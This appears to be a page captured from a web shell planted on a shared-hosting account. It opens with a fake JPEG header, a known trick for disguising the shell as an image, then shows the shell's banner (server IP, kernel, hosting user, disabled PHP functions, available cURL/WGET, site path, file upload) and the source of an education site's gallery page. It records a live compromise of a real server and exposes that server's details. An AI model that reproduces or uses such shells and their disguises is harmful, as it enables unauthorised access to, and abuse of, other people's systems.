���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/aaryaedutech.com/public_html/ |
Upload File : |
<?php include_once './action/config.php'; $qry = mysqli_query($con, "SELECT * FROM gallery ORDER BY uploaded_at DESC"); ?> <!DOCTYPE html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Link of CSS files --> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" href="assets/css/owl.carousel.min.css"> <link rel="stylesheet" href="assets/css/remixicon.css"> <link rel="stylesheet" href="assets/css/magnific-popup.min.css"> <link rel="stylesheet" href="assets/css/header.css"> <link rel="stylesheet" href="assets/css/style.css"> <link rel="stylesheet" href="assets/css/footer.css"> <link rel="stylesheet" href="assets/css/responsive.css"> <title><?= $shop . ' | ' . $page ?></title> <link rel="icon" type="image/png" href="assets/img/all-img/favicon.png"> </head> <body> <?php include './header.php' ?> <!-- Page Title Area Start--> <section class="page-title-area position-relative"> <div class="container"> <div class="main-max-width"> <div class="page-title-content"> <h2>Gallery</h2> <ul class="page-breadcrumb align-items-center list-unstyle"> <li class="breadcrumb-item"><a href="./">Home</a></li> <li class="breadcrumb-item"></li> <li class="primery-link">Gallery</li> </ul> <div class="shape-1 moveHorizontal"> <img src="assets/img/icon/shape-2.svg" alt="image"> </div> <div class="shape-2"> <img src="assets/img/icon/section-icon-1.svg" alt="image"> </div> <div class="shape-3 bounce"> <img src="assets/img/icon/section-icon-2.svg" alt="image"> </div> </div> </div> </div> </section> <!-- Page Title Area End--> <!-- Courses Section Start --> <div class="courses-section ptb-100"> <div class="container"> <div class="main-max-width"> <div class="row"> <?php while ($row = mysqli_fetch_assoc($qry)) { ?> <div class="col-md-4"> <div class="gallery-item" style="display: inline-block; margin: 10px;"> <img src="admin/images/<?= $gallery_path . $row['image'] ?>" alt="Gallery Image"> </div> </div> <?php } ?> </div> </div> </div> </div> <!-- Courses Section End --> <?php include './footer.php' ?> </body> </html>